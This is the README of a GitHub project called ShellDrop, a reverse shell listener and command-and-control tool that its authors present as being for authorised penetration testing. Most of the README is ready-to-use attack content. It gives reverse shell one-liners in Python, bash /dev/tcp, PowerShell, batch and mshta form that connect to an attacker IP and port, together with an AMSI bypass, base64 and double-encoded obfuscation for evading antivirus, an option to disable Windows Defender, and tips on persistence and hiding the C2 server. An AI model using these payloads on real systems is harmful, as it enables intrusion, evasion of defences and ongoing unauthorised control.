plse this is beta i am working on fixing the window payload till now they payload is working upto window 10 if u face any issu in window 11 plase dont raise any issu window payload may not work perfectly in beta
╔═══════════════════════════════════════════════════════════════╗
║ ShellDrop V 1.0 beta ║
║ Professional Reverse Shell Listener and payload generator ║
║ ║
║ Author: unknone hart / kishwor dulal ║
║ Purpose: Authorized Penetration Testing & Red Team Ops ║
╚═══════════════════════════════════════════════════════════════╝
A Professional Multi-Client Command & Control Framework
.jpg){kind=link}
Features • Installation • Usage • Payloads • Examples • Legal
ShellDrop is a robust, feature-rich reverse shell listener designed for authorized penetration testing and red team operations. It provides a professional command and control interface with multi-client support, advanced payload generation, and real-time session management.
- 🔄 Multi-Client Support - Manage multiple simultaneous reverse shell connections
- 🎨 Interactive UI - Colorized terminal output with intuitive command interface
- 🔐 Advanced Payloads - Pre-built obfuscated shells for Linux & Windows
- 🚀 Real-Time Switching - Seamlessly switch between active sessions
- 🧵 Thread-Safe - Robust concurrent connection handling
- 🎭 Stealth Options - Base64 encoding, AMSI bypass, AV evasion techniques
| Feature | Description |
|---|---|
| Multi-Session Management | Handle unlimited concurrent reverse shell connections |
| Session Backgrounding | Background sessions and return to main menu anytime |
| Auto IP Detection | Automatically detects your local IP address |
| Payload Generator | Generates 13+ ready-to-use payloads for various scenarios |
| Thread-Safe I/O | Clean output handling without race conditions |
| Prompt Detection | Automatically detects and displays remote shell prompts |
- Colorized Output - Easy-to-read color-coded messages
- Session Tracking - View all active sessions with IP addresses
- Interactive Prompts - Context-aware command prompts
- Background Operations - Run commands while viewing output from all sessions
- AMSI Bypass - Multi-layer Windows Defender evasion
- Base64 Encoding - Obfuscated payload delivery
- Double Encoding - Extra obfuscation for detection evasion
- Silent Execution - Suppresses error messages and logs
- AV Kill Switch - Optional Windows Defender disabling (detectable)
# Python 3.x required (3.7+ recommended)
python3 --version# Clone the repository
git clone https://github.com/kishwordulal1234/ShellDrop.git
# Navigate to directory
cd ShellDrop
# Make executable (Linux/Mac)
chmod +x shelldrop.py
# Run the tool
python3 shelldrop.py -p 4444No external dependencies required! ShellDrop uses only Python standard library:
socket- Network communicationthreading- Concurrent connection handlingbase64- Payload encodinggzip- Payload compression
python3 shelldrop.py -p <PORT>usage: shelldrop.py [-h] [-l LISTEN_IP] -p PORT [--kill-av]
options:
-h, --help Show this help message and exit
-l, --listen-ip IP address to bind (auto-detected if not provided)
-p, --port PORT Port to listen on (required)
--kill-av Add Windows Defender disable commands (highly detectable)# Listen on port 4444 (auto-detect IP)
python3 shelldrop.py -p 4444
# Specify listening IP
python3 shelldrop.py -l 192.168.1.100 -p 4444
# Enable AV kill switch (WARNING: Very detectable!)
python3 shelldrop.py -p 4444 --kill-avOnce ShellDrop is running, use these commands:
| Command | Description |
|---|---|
list |
Display all active sessions with IDs and IP addresses |
use <id> |
Interact with a specific session by ID |
help |
Show available commands |
exit / quit |
Shutdown the listener and close all connections |
| Command | Description |
|---|---|
<command> |
Execute any command on the remote system |
background |
Background the current session and return to main menu |
shelldrop> list
╔═══ ACTIVE SESSIONS ═══════════════════════════════════════╗
║ Session 01 │ 192.168.1.105 : 49234
║ Session 02 │ 10.0.0.50 : 52891
╚═══════════════════════════════════════════════════════════╝
shelldrop> use 1
[*] Interacting with Session 1 | Type 'background' to detach
shelldrop>@user@target:~$> whoami
user
shelldrop>@user@target:~$> id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),27(sudo)
shelldrop>@user@target:~$> background
[*] Session 1 backgrounded (still active)
shelldrop> exit
[*] Shutting down ShellDrop...ShellDrop generates 13+ different payloads optimized for various scenarios.
Use Case: Direct execution on Linux systems with Python installed
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])' 2>/dev/null✅ Simple and reliable
✅ Suppresses error output
✅ Full interactive bash shell
Use Case: Pure bash reverse shell
bash -c "exec bash -i &>/dev/tcp/YOUR_IP/PORT 0>&1" 2>/dev/null✅ No Python required
✅ Works on minimal systems
✅ Very fast connection
Use Case: Bypass basic command logging
python3 -c "import base64;exec(base64.b64decode('BASE64_PAYLOAD'))" 2>/dev/null✅ Obfuscated payload
✅ Evades simple detection
✅ Base64 encoded
Use Case: Persistent connection with evasion
(bash -c "eval \"$(echo BASE64_PAYLOAD|base64 -d)\"" &) >/dev/null 2>&1✅ Runs in background
✅ Completely silent
✅ Obfuscated execution
Use Case: Maximum obfuscation
(python3 -c "import base64;exec(base64.b64decode(base64.b64decode('DOUBLE_ENCODED')))" &) >/dev/null 2>&1✅ Double base64 encoding
✅ Background execution
✅ Maximum stealth
Use Case: Bypass Windows Defender AMSI scanning
powershell -nop -w hidden -ep bypass -c "try{[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)}catch{};..."✅ Multi-layer AMSI bypass
✅ Hidden window
✅ Gzip compressed
✅ Base64 encoded
Use Case: Quick PowerShell reverse shell
powershell -nop -w hidden -c "$s=New-Object Net.Sockets.TCPClient('YOUR_IP',PORT);..."✅ Fast execution
✅ Hidden window
✅ Full PowerShell access
Use Case: Windows systems with Python installed
python -c "import socket,subprocess,os,threading,sys;s=socket.socket();s.connect(('YOUR_IP',PORT));..."✅ Threading-based
✅ Windows compatible
✅ Handles I/O properly
Use Case: Minimal Python reverse shell
python -c "import socket,subprocess;s=socket.socket();s.connect(('YOUR_IP',PORT));[s.send(subprocess.run(s.recv(1024).decode(),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE).stdout) for _ in iter(int,1)]"✅ One-liner
✅ No threading
✅ Compact payload
Use Case: Obfuscated Python execution
python -c "import base64;exec(base64.b64decode('BASE64_ENCODED_PAYLOAD'))"✅ Base64 obfuscation
✅ Thread-safe
✅ Proper error handling
Use Case: Generate downloadable .bat file
@echo off
set ip=YOUR_IP
set port=PORT
powershell -nop -w hidden -ep bypass -c "..."✅ Self-contained file
✅ Double-click execution
✅ PowerShell wrapper
Use Case: Execute via Windows MSHTA
mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -nop -w hidden -c ...""", 0:close")✅ VBScript wrapper
✅ Silent execution
✅ No visible window
Scenario: Test shell access on Linux target
# 1. Start ShellDrop
python3 shelldrop.py -p 4444
# 2. On target machine, execute:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.100",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])' 2>/dev/null
# 3. Session established!
[+] New session established: 192.168.1.105:49234 → Client ID: 1
shelldrop> use 1
shelldrop>@user@target:~$> whoami
userScenario: Handle multiple compromised systems
shelldrop> list
╔═══ ACTIVE SESSIONS ═══════════════════════════════════════╗
║ Session 01 │ 192.168.1.105 : 49234
║ Session 02 │ 192.168.1.106 : 52891
║ Session 03 │ 10.0.0.50 : 41023
╚═══════════════════════════════════════════════════════════╝
# Work with Session 1
shelldrop> use 1
shelldrop>@user@server1:~$> hostname
server1
shelldrop>@user@server1:~$> background
# Switch to Session 2
shelldrop> use 2
shelldrop>@admin@server2:~$> whoami
adminScenario: Bypass Windows Defender on Windows 10/11
# 1. Start ShellDrop
python3 shelldrop.py -p 4444
# 2. On Windows target, execute the PowerShell AMSI Bypass payload
powershell -nop -w hidden -ep bypass -c "try{[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)}catch{};..."
# 3. Access the Windows shell
[+] New session established: 192.168.1.200:50123 → Client ID: 1
shelldrop> use 1
shelldrop>PS C:\Users\User> whoami
desktop-abc123\user
shelldrop>PS C:\Users\User> Get-Process | Select-Object -First 5Scenario: Persistent access with obfuscation
# Use double-encoded backgrounded Python payload
(python3 -c "import base64;exec(base64.b64decode(base64.b64decode('PAYLOAD')))" &) >/dev/null 2>&1
# Connection runs in background
# No terminal output
# Survives logout (with additional persistence)┌─────────────────────────────────────────────────────────┐
│ ShellDrop Server │
├─────────────────────────────────────────────────────────┤
│ │
│ ┌──────────────┐ ┌──────────────┐ │
│ │ Main Loop │───▶│ Input Queue │ │
│ └──────────────┘ └──────────────┘ │
│ │ │ │
│ ▼ ▼ │
│ ┌──────────────────────────────────┐ │
│ │ Connection Acceptor Thread │ │
│ └──────────────────────────────────┘ │
│ │ │
│ ▼ │
│ ┌───────────────────────────────────────┐ │
│ │ Client Objects (Thread per Client) │ │
│ ├───────────────────────────────────────┤ │
│ │ Client 1 │ Client 2 │ Client 3 │ │
│ │ Thread │ Thread │ Thread │ │
│ └───────────────────────────────────────┘ │
│ │ │ │ │
│ ▼ ▼ ▼ │
│ ┌────────────────────────────────────────┐ │
│ │ Output Queues (Per Client) │ │
│ └────────────────────────────────────────┘ │
│ │
└─────────────────────────────────────────────────────────┘
│
▼
┌──────────────────────┐
│ Remote Targets │
├──────────────────────┤
│ 🐧 Linux Systems │
│ 🪟 Windows Systems │
└──────────────────────┘
- Global Lock (
clients_lock) - Protects client dictionary - Print Lock (
print_lock) - Ensures clean output - Output Queues - Thread-safe communication per client
- Daemon Threads - Automatic cleanup on exit
Multi-layer bypass to evade Windows Antimalware Scan Interface:
# Layer 1: Direct field manipulation
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
.GetField('amsiInitFailed','NonPublic,Static')
.SetValue($null,$true)
# Layer 2: Reflection-based bypass
$a=[Ref].Assembly.GetTypes();
Foreach($b in $a){if($b.Name -like '*iUtils'){$c=$b}};
...All advanced payloads use base64 encoding to:
- Bypass command-line logging
- Evade string-based detection
- Obfuscate payload intent
PowerShell payloads are gzip-compressed to:
- Reduce payload size
- Add extra obfuscation layer
- Improve transfer speed
All payloads redirect stderr to /dev/null or equivalent:
2>/dev/null # Linux
-ErrorAction SilentlyContinue # PowerShellBackground execution options:
(command &) >/dev/null 2>&1 # Linux
-w hidden # PowerShellSolution:
# Manually specify your IP
python3 shelldrop.py -l YOUR_IP -p 4444Explanation: The basic Python payloads don't generate prompts, but commands still work!
# Just type commands - output will appear
dir
whoami
ipconfigPossible Causes:
- Firewall blocking outbound connection
- Antivirus blocking execution
- Wrong IP/port in payload
Solutions:
# Check firewall
sudo ufw status # Linux
Get-NetFirewallRule # Windows
# Temporarily disable AV (testing only!)
python3 shelldrop.py -p 4444 --kill-av
# Verify IP/port
ip addr show # Linux
ipconfig # WindowsPossible Causes:
- Command syntax error in payload
- Missing dependencies (Python not installed)
- Network timeout
Solutions:
# Test Python availability
python3 --version # Linux
python --version # Windows
# Use simpler payload
bash -c "exec bash -i &>/dev/tcp/YOUR_IP/PORT 0>&1" # LinuxSolution:
# Kill process using the port
sudo lsof -i :4444
sudo kill -9 <PID>
# Or use a different port
python3 shelldrop.py -p 4445- Always get written authorization before testing
- Document all sessions - Keep logs of connections
- Use unique ports - Avoid common ports (4444, 8080, etc.)
- Clean up after testing - Close all sessions properly
- Test payloads safely - Verify in isolated environment first
- Layer your obfuscation - Use encoded + backgrounded payloads
- Vary your payloads - Don't use same payload repeatedly
- Monitor for detection - Watch for alerts/blocks
- Use port forwarding - Hide actual C2 server
- Implement persistence - Add cron jobs / scheduled tasks
- Never use on unauthorized systems - This is illegal
- Secure your listener - Use firewalls and VPNs
- Encrypt communications - Consider SSH tunneling
- Limit exposure - Only listen when actively testing
- Update regularly - Keep tool and Python up-to-date
| Feature | ShellDrop | Metasploit | Netcat | Empire |
|---|---|---|---|---|
| Multi-Client | ✅ | ✅ | ❌ | ✅ |
| Payload Generator | ✅ | ✅ | ❌ | ✅ |
| AMSI Bypass | ✅ | ✅ | ❌ | ✅ |
| Interactive UI | ✅ | ✅ | ❌ | ✅ |
| No Dependencies | ✅ | ❌ | ✅ | ❌ |
| Lightweight | ✅ | ❌ | ✅ | ❌ |
| Session Backgrounding | ✅ | ✅ | ❌ | ✅ |
| Learning Curve | 🟢 Easy | 🟡 Medium | 🟢 Easy | 🔴 Hard |
- Session persistence (reconnection support)
- File upload/download capability
- Command history per session
- Tab completion
- Session logging to file
- Encrypted communications (TLS/SSL)
- Web-based UI
- Plugin system
- Port forwarding
- Screenshot capture (Windows)
- Database backend
- RESTful API
- Mobile app support
- Automated exploitation
- C2 server mesh networking
Contributions are welcome! Please follow these guidelines:
- Fork the repository
- Create a feature branch
git checkout -b feature/amazing-feature
- Commit your changes
git commit -m 'Add amazing feature' - Push to branch
git push origin feature/amazing-feature
- Open a Pull Request
- 🐛 Bug fixes and improvements
- 📝 Documentation enhancements
- 🎨 UI/UX improvements
- 🔧 New payload types
- 🌐 Cross-platform compatibility
- 🔒 Additional evasion techniques
- ✨ Initial release
- ✅ Multi-client support
- ✅ 13+ payload templates
- ✅ Linux & Windows support
- ✅ AMSI bypass for Windows
- ✅ Interactive command interface
- ✅ Session management
- ✅ Thread-safe operations
╔═══════════════════════════════════════════════════════════════╗
║ IMPORTANT LEGAL NOTICE ║
╚═══════════════════════════════════════════════════════════════╝
This tool is designed for EDUCATIONAL PURPOSES and AUTHORIZED
PENETRATION TESTING ONLY.
❌ UNAUTHORIZED USE IS STRICTLY PROHIBITED AND ILLEGAL
By using this tool, you agree to:
1. ✅ Only use on systems you own or have WRITTEN PERMISSION to test
2. ✅ Comply with all applicable local, state, and federal laws
3. ✅ Take full responsibility for your actions
4. ✅ Not use for malicious purposes
The author(s) assume NO LIABILITY for misuse or damage caused by
this tool. Unauthorized access to computer systems is a federal
crime in most countries.
⚖️ Relevant Laws (USA):
- Computer Fraud and Abuse Act (CFAA) - 18 U.S.C. § 1030
- Electronic Communications Privacy Act (ECPA)
🌍 International: Similar laws exist in most countries
USE AT YOUR OWN RISK. BE ETHICAL. BE LEGAL.
unknone hart / kishwor dulal
Found a bug? Please open an issue on GitHub with:
- Python version
- Operating system
- Error message (if any)
- Steps to reproduce
- GitHub Discussions - Ask questions, share ideas
- Pull Requests - Contribute improvements
- Star the repo - Show your support! ⭐
This project is released under the Educational Use License.
Copyright (c) 2024 unknone hart / kishwor dulal
Permission is granted to use this software for educational and
authorized security testing purposes only.
THIS SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND.
Special thanks to:
- The Python Software Foundation
- The penetration testing community
- All contributors and testers
- Security researchers worldwide
Made with ❤️ for the Security Community
╔═══════════════════════════════════════════════════════════╗
║ ShellDrop Quick Reference ║
╠═══════════════════════════════════════════════════════════╣
║ BASIC USAGE ║
║ python3 shelldrop.py -p 4444 ║
║ ║
║ COMMANDS ║
║ list - Show active sessions ║
║ use <id> - Interact with session ║
║ background - Background current session ║
║ help - Show help ║
║ exit - Quit ShellDrop ║
║ ║
║ BEST PAYLOADS ║
║ 🐧 Linux: Python - Raw (reliable) ║
║ 🐧 Linux: Bash - Obfuscated (stealth) ║
║ 🪟 Windows: PowerShell - AMSI Bypass (bypass AV) ║
║ 🪟 Windows: Python - Raw (if Python installed) ║
╚═══════════════════════════════════════════════════════════╝
Stay Ethical. Stay Legal. Happy Hacking! 🔒